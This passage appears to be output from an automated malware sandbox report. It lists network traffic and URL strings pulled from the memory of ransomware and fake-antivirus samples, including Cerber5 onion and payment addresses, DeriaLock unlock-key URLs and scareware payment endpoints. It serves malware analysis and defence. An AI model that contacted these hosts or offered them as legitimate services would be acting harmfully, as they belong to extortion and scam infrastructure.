          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.145:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.146:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.147:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.148:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.149:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.150:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.151:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.152:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.153:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.154:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.155:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.156:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.157:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.158:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.159:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.160:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.161:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.162:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.163:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.164:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.165:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.166:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.177.167:6893
          Source: rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.539681457.0000000004652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
          Source: rundll32.exe, 00000016.00000002.521703889.0000000004645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/~
          Source: avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://antiviruspc-update.com:8080/
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.blo
          Source: Endermanch@DeriaLock.exe, 0000001E.00000000.395625850.00000000008B6000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/
          Source: Endermanch@DeriaLock.exe, 0000001E.00000000.395625850.00000000008B6000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/LOGON.exe
          Source: Endermanch@DeriaLock.exe, 0000001E.00000000.395625850.00000000008B6000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txt
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://btc.blo
          Source: avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://bugs.clamav.net
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Endermanch@Antivirus.exe, 0000000E.00000000.354486231.00000000004AE000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://checkeds.com/customers/installer.php?pid=AVT_BASIC
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
          Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.408744646.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://diskcryptor.net/
          Source: Endermanch@AnViPC2009.exe, 00000011.00000003.380540315.00000000025D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gnuwin32.sourceforge.net
          Source: avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://google.ru/
          Source: avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/K
          Source: avpc2009.exe, 0000001A.00000003.419411879.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/fbee4e28-f13c-4918-a85-85d5315c23f
          Source: avpc2009.exe, 0000001A.00000003.419411879.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/fbee4e28-f13c-4918-a85-85d5315c23fC
          Source: avpc2009.exe, 0000001A.00000003.419411879.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/fbee4e28-f13c-4918-a85-85d5315c23fa
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://highway-traffic.com/avt/avt_db
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://highway-traffic.com/avt/avt_db=
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe, 00000023.00000000.408184586.0000000000409000.00000008.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe, 00000023.00000000.408184586.0000000000409000.00000008.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.dr, Endermanch@Cerber5.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
          Source: Endermanch@SecurityDefener2015.exe.0.drString found in binary or memory: http://paypal.com/http://xhamster.com/http://visa.com/91.194.254.16download-defendersupport-defender
          Source: Endermanch@Krotten.exe.0.drString found in binary or memory: http://poetry.rotten.com/lightning/
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcb.com/rb.crl0W
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcb.com/rb.crt0
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcd.com0&
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com0
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
          Source: svchost.exe, 00000007.00000003.298351129.000001577B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mro
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/avt/avt.dat
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/avt/avt.dates
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/avt/avt_db
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/avt/avt_dbm
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/avt/avt_dbmy
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/avt/avt_dbst7
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/avt/avtr.dat
          Source: Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://searchdusty.com/avt/avtr.datmu
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0W
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: Endermanch@DeriaLock.exe, 0000001E.00000000.393866499.0000000000872000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://wallup.net
          Source: Endermanch@DeriaLock.exe, 0000001E.00000000.393866499.0000000000872000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://wallup.nethttp://wallup.nethttp://wallup.net
          Source: svchost.exe, 00000005.00000002.314750739.0000017D58413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
          Source: avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.clamav.net
          Source: avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.clamav.net/bugs
          Source: avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.clamav.net/support/faq
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: Endermanch@DeriaLock.exe, 0000001E.00000003.467486332.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000001E.00000003.467505750.0000000005DBB000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000001E.00000003.467449971.0000000005DBB000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000001E.00000003.467419108.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000001E.00000003.468563029.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000001E.00000003.468697693.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Endermanch@AnViPC2009.exe, 00000011.00000003.380540315.00000000025D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/libtool/libtool.htmlDVarFileInfo$
          Source: Endermanch@HappyAntivirus.exe, 00000028.00000000.427256205.0000000000D78000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://www.happyantivirus.co.cc/register.html
          Source: Endermanch@DeriaLock.exe, 0000001E.00000003.468697693.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/get_data.php?id=
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/new_install.php?owner=
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/paydefault.php;http//wwww.vikingwebscanner.com/scripts/defau
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/paymore.php
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://www.vikingwebscanner.com/scripts/status.php?action=
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://www.vikingwebscanner.com/succes/.
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://www.vikingwebscanner.com/succes/index.php#pictureBox1.Image
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.17gcun.top/7846-944A-0126-0098-B8F9
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.18ey8e.top/7846-944A-0126-0098-B8F9
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.19kdeh.top/7846-944A-0126-0098-B8F9
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1mpsnr.top/7846-944A-0126-0098-B8F9
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1n5mod.top/7846-944A-0126-0098-B8F9
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.422769367.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://auto.ru/?from=morda&utm_source=yandex_list_service&utm_medium=cpm&utm_campaign=yls_r10000_ti
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.422769367.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://auto.ru/cars/all/?gear_type%5B%5D=ALL_WHEEL_DRIVE&price_to=500000&from=morda&utm_source=yand
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
          Source: rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa06
          Source: svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.314910686.0000017D5842A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000005.00000002.314975708.0000017D5843E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000005.00000002.315090593.0000017D5844F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314153614.0000017D58446000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314438636.0000017D58448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000005.00000002.314910686.0000017D5842A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000005.00000002.314975708.0000017D5843E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000005.00000002.314910686.0000017D5842A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000005.00000002.315003924.0000017D58443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314270382.0000017D58441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000005.00000002.315003924.0000017D58443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314270382.0000017D58441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314270382.0000017D58441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: avpc2009.exe, 0000001A.00000003.419411879.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dr.yandex.net/nel
          Source: avpc2009.exe, 0000001A.00000003.419411879.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dr2.yandex.net/nel
          Source: svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
